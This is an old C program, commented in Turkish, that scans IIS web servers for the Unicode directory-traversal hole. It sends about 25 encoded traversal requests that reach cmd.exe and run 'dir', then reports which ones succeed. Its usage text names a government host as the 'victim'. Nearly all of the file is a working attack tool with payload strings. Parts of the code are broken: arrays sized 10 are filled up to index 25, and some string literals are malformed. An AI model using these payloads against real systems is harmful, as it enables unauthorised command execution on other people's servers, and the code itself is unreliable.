/* iss web serverlarında  Unicode bug'u serverda aratma
 * 
 * Rammstein - admin@xmirc.com  - irc.ada.net.tr #root
 *
 * Rooting Sabotage Forced - www.rooting.cjb.net
 *
 * Kullanım ./iss www.victim.telekom.gov.tr :))) 
 *
 * gcc de derlemek için ; gcc -o iss iss.c
 *
 * Bu Programın kodları tamamen bana ait değildir Gerekli yerlerdeki değişikleri 
 * yapıp en çok bulunan Unicode bug'ları ile fix ledim programa katkıda bulunan 
 * PcKiLLeR - CiLeK - Cancer-X - Sephiroth ' a tşkler :)
 */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



void main(int argc, char *argv[])
{

  char *bulunan;
  char tampon[1024];
  char mesaj[] = "200";
  int toplam=0;
  int sayac;
  int buldum=0;
  char shoptampon[20];
  char *tmp[10];
  char *hata[10];


  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long giris;
  unsigned long duzelt;


tmp[1]="GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[2]="GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[3]="GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[4]="GET /iisadmpwd/..%c0%af../cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[5]="GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[6]="GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[7]="GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[8]="GET /scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[9]="GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[10]="GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[11]="GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[12]="GET /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[13]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[14]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[15]="GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[16]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[17]="GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[18]="GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[19]="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[20]="GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[21]="GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[22]="GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[23]="GET /..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[24]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[25]="GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";

hata[1] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[2] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir ";
hata[3] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[4] = "/iisadmpwd/..%c0%af../cmd.exe?/c+dir ";
hata[5] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[6] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[7] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir ";
hata[8] = "/scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir ";
hata[9] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[10] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[11] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[12] = "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[13] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[14] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[15] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[16] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[17] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[18] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[19] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[20] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir ";
hata[21] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[22] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[23] = "/..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[24] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[25] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ ";

if (argc<2)
  {
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\nUnicode Scanner (c) 2002 ");
printf("\nKullanImI : %s www.victim.telekom.gov.tr
\n\n",argv[0]);

exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname"); 
exit(0);
}
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\t Unicode Scanner (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Okey unicode bug Bulundu bu iş tamam :\)\n");++buldum;
}
close(sock);
}

if (buldum)
{
printf("\n Tarama isLemi %s web Sitesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucunda Unicode bugu
bulunamamIstIr...\n\n");

}